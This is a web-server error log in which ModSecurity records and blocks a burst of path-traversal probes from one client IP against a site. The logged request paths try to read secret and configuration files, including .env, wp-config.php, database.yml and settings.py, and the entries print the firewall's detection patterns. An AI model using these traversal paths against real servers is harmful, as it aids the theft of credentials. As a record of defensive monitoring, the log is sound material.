[Tue May 12 06:16:59.005619 2026] [security2:error] [pid 1842385:tid 1842404] [client 45.148.10.166:60162] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /uploads../../.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/.env.local"] [unique_id "agKpuxs7kySIUZ3ORnI1ngAAAQ4"]
[Tue May 12 06:16:59.005711 2026] [security2:error] [pid 1842385:tid 1842404] [client 45.148.10.166:60162] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env.local"] [unique_id "agKpuxs7kySIUZ3ORnI1ngAAAQ4"]
[Tue May 12 06:16:59.005878 2026] [security2:error] [pid 1842385:tid 1842404] [client 45.148.10.166:60162] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env.local"] [unique_id "agKpuxs7kySIUZ3ORnI1ngAAAQ4"]
[Tue May 12 06:16:59.502443 2026] [security2:error] [pid 1842385:tid 1842404] [client 45.148.10.166:60162] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpuxs7kySIUZ3ORnI1ngAAAQ4"]
[Tue May 12 06:16:59.532866 2026] [security2:error] [pid 1842385:tid 1842404] [client 45.148.10.166:60162] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /uploads../../.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/.env.production"] [unique_id "agKpuxs7kySIUZ3ORnI1nwAAAQ4"]
[Tue May 12 06:16:59.532952 2026] [security2:error] [pid 1842385:tid 1842404] [client 45.148.10.166:60162] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env.production"] [unique_id "agKpuxs7kySIUZ3ORnI1nwAAAQ4"]
[Tue May 12 06:16:59.533121 2026] [security2:error] [pid 1842385:tid 1842404] [client 45.148.10.166:60162] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env.production"] [unique_id "agKpuxs7kySIUZ3ORnI1nwAAAQ4"]
[Tue May 12 06:17:00.017178 2026] [security2:error] [pid 1842385:tid 1842404] [client 45.148.10.166:60162] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpuxs7kySIUZ3ORnI1nwAAAQ4"]
[Tue May 12 06:17:00.045922 2026] [security2:error] [pid 1842385:tid 1842404] [client 45.148.10.166:60162] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /uploads../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/wp-config.php"] [unique_id "agKpvBs7kySIUZ3ORnI1oAAAAQ4"]
[Tue May 12 06:17:00.045998 2026] [security2:error] [pid 1842385:tid 1842404] [client 45.148.10.166:60162] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/wp-config.php"] [unique_id "agKpvBs7kySIUZ3ORnI1oAAAAQ4"]
[Tue May 12 06:17:00.046163 2026] [security2:error] [pid 1842385:tid 1842404] [client 45.148.10.166:60162] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/wp-config.php"] [unique_id "agKpvBs7kySIUZ3ORnI1oAAAAQ4"]
[Tue May 12 06:17:00.518010 2026] [security2:error] [pid 1842385:tid 1842404] [client 45.148.10.166:60162] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpvBs7kySIUZ3ORnI1oAAAAQ4"]
[Tue May 12 06:17:00.547619 2026] [security2:error] [pid 1842385:tid 1842404] [client 45.148.10.166:60162] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /uploads../../app/etc/env.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/app/etc/env.php"] [unique_id "agKpvBs7kySIUZ3ORnI1oQAAAQ4"]
[Tue May 12 06:17:00.547817 2026] [security2:error] [pid 1842385:tid 1842404] [client 45.148.10.166:60162] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/app/etc/env.php"] [unique_id "agKpvBs7kySIUZ3ORnI1oQAAAQ4"]
[Tue May 12 06:17:01.010954 2026] [security2:error] [pid 1842385:tid 1842404] [client 45.148.10.166:60162] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpvBs7kySIUZ3ORnI1oQAAAQ4"]
[Tue May 12 06:17:01.042559 2026] [security2:error] [pid 1842385:tid 1842404] [client 45.148.10.166:60162] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /uploads../../settings.py"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/settings.py"] [unique_id "agKpvRs7kySIUZ3ORnI1pAAAAQ4"]
[Tue May 12 06:17:01.042759 2026] [security2:error] [pid 1842385:tid 1842404] [client 45.148.10.166:60162] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/settings.py"] [unique_id "agKpvRs7kySIUZ3ORnI1pAAAAQ4"]
[Tue May 12 06:17:01.494649 2026] [security2:error] [pid 1842385:tid 1842404] [client 45.148.10.166:60162] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpvRs7kySIUZ3ORnI1pAAAAQ4"]
[Tue May 12 06:17:01.526201 2026] [security2:error] [pid 1842385:tid 1842404] [client 45.148.10.166:60162] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /uploads../../config/database.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/config/database.yml"] [unique_id "agKpvRs7kySIUZ3ORnI1pQAAAQ4"]
[Tue May 12 06:17:01.526400 2026] [security2:error] [pid 1842385:tid 1842404] [client 45.148.10.166:60162] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/config/database.yml"] [unique_id "agKpvRs7kySIUZ3ORnI1pQAAAQ4"]
[Tue May 12 06:17:01.992281 2026] [security2:error] [pid 1842385:tid 1842404] [client 45.148.10.166:60162] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpvRs7kySIUZ3ORnI1pQAAAQ4"]
[Tue May 12 06:17:02.022253 2026] [security2:error] [pid 1842385:tid 1842404] [client 45.148.10.166:60162] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /images../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKpvhs7kySIUZ3ORnI1pgAAAQ4"]
[Tue May 12 06:17:02.022335 2026] [security2:error] [pid 1842385:tid 1842404] [client 45.148.10.166:60162] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKpvhs7kySIUZ3ORnI1pgAAAQ4"]
[Tue May 12 06:17:02.022500 2026] [security2:error] [pid 1842385:tid 1842404] [client 45.148.10.166:60162] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKpvhs7kySIUZ3ORnI1pgAAAQ4"]
[Tue May 12 06:17:02.486156 2026] [security2:error] [pid 1842385:tid 1842404] [client 45.148.10.166:60162] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpvhs7kySIUZ3ORnI1pgAAAQ4"]
[Tue May 12 06:17:02.515335 2026] [core:error] [pid 1842385:tid 1842404] [client 45.148.10.166:60162] AH10244: invalid URI path (/images../../../.env)
[Tue May 12 06:17:03.086100 2026] [core:error] [pid 1808852:tid 1808855] [client 45.148.10.166:60174] AH10244: invalid URI path (/images../../../../.env)
[Tue May 12 06:17:03.616359 2026] [security2:error] [pid 1842385:tid 1842390] [client 45.148.10.166:60188] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /images../../.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/.env.local"] [unique_id "agKpvxs7kySIUZ3ORnI1qgAAAQA"]
[Tue May 12 06:17:03.616438 2026] [security2:error] [pid 1842385:tid 1842390] [client 45.148.10.166:60188] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env.local"] [unique_id "agKpvxs7kySIUZ3ORnI1qgAAAQA"]
[Tue May 12 06:17:03.616610 2026] [security2:error] [pid 1842385:tid 1842390] [client 45.148.10.166:60188] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env.local"] [unique_id "agKpvxs7kySIUZ3ORnI1qgAAAQA"]
[Tue May 12 06:17:04.145637 2026] [security2:error] [pid 1842385:tid 1842390] [client 45.148.10.166:60188] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpvxs7kySIUZ3ORnI1qgAAAQA"]
[Tue May 12 06:17:04.175837 2026] [security2:error] [pid 1842385:tid 1842390] [client 45.148.10.166:60188] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /images../../.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/.env.production"] [unique_id "agKpwBs7kySIUZ3ORnI1qwAAAQA"]
[Tue May 12 06:17:04.175930 2026] [security2:error] [pid 1842385:tid 1842390] [client 45.148.10.166:60188] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env.production"] [unique_id "agKpwBs7kySIUZ3ORnI1qwAAAQA"]
[Tue May 12 06:17:04.176104 2026] [security2:error] [pid 1842385:tid 1842390] [client 45.148.10.166:60188] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env.production"] [unique_id "agKpwBs7kySIUZ3ORnI1qwAAAQA"]
[Tue May 12 06:17:04.636307 2026] [security2:error] [pid 1842385:tid 1842390] [client 45.148.10.166:60188] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpwBs7kySIUZ3ORnI1qwAAAQA"]
